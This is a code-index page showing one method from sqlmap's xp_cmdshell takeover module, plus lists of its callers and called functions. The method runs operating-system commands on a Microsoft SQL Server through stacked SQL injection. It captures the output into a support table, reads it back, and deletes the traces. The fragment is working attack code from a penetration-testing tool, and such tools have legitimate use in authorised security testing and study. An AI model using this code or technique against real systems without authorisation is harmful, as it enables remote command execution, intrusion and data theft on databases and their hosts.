MCPcopy Index your code
hub / github.com/sqlmapproject/sqlmap / xpCmdshellEvalCmd

Method xpCmdshellEvalCmd

lib/takeover/xp_cmdshell.py:191–246  ·  view source on GitHub ↗
(self, cmd, first=None, last=None)

Source from the content-addressed store, hash-verified

189 return inject.goStacked(self.xpCmdshellForgeCmd(cmd), silent)
190
191 def xpCmdshellEvalCmd(self, cmd, first=None, last=None):
192 output = None
193
194 if conf.direct:
195 output = self.xpCmdshellExecCmd(cmd)
196
197 if output and isinstance(output, (list, tuple)):
198 new_output = ""
199
200 for line in output:
201 if line == "NULL":
202 new_output += "\n"
203 else:
204 new_output += "%s\n" % line.strip("\r")
205
206 output = new_output
207 else:
208 inject.goStacked(self.xpCmdshellForgeCmd(cmd, self.cmdTblName))
209
210 # When user provides DBMS credentials (with --dbms-cred), the
211 # command standard output is redirected to a temporary file
212 # The file needs to be copied to the support table,
213 # 'sqlmapoutput'
214 if conf.dbmsCred:
215 inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, self.tmpFile, randomStr(10), randomStr(10)))
216 self.delRemoteFile(self.tmpFile)
217
218 query = "SELECT %s FROM %s ORDER BY id" % (self.tblField, self.cmdTblName)
219
220 if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct:
221 output = inject.getValue(query, resumeValue=False, blind=False, time=False)
222
223 if (output is None) or len(output) == 0 or output[0] is None:
224 output = []
225 count = inject.getValue("SELECT COUNT(id) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS)
226
227 if isNumPosStrValue(count):
228 for index in getLimitRange(count):
229 query = agent.limitQuery(index, query, self.tblField)
230 output.append(inject.getValue(query, union=False, error=False, resumeValue=False))
231
232 inject.goStacked("DELETE FROM %s" % self.cmdTblName)
233
234 if output and isListLike(output) and len(output) > 1:
235 _ = ""
236 lines = [line for line in flattenValue(output) if line is not None]
237
238 for i in xrange(len(lines)):
239 line = lines[i] or ""
240 if line is None or i in (0, len(lines) - 1) and not line.strip():
241 continue
242 _ += "%s\n" % line
243
244 output = _.rstrip('\n')
245
246 return output
247
248 def xpCmdshellInit(self):

Callers 2

_xpCmdshellTestMethod · 0.95
evalCmdMethod · 0.80

Calls 12

xpCmdshellExecCmdMethod · 0.95
xpCmdshellForgeCmdMethod · 0.95
randomStrFunction · 0.90
isTechniqueAvailableFunction · 0.90
isNumPosStrValueFunction · 0.90
getLimitRangeFunction · 0.90
isListLikeFunction · 0.90
flattenValueFunction · 0.90
xrangeClass · 0.85
delRemoteFileMethod · 0.80
limitQueryMethod · 0.80
appendMethod · 0.45

Tested by

no test coverage detected